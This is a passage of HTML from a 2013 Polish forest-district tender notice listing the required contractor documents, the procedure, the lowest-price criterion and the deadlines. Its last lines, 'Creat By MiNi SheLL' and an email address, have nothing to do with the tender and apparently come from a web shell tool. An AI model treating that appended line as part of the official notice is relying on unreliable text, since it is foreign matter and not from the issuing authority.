<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/rudziniec<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Rudziniec ul. Leśna 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 09:00, miejsce: Nadleśnictwo Rudziniec ul. Leśna 7  44-160 Rudziniec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com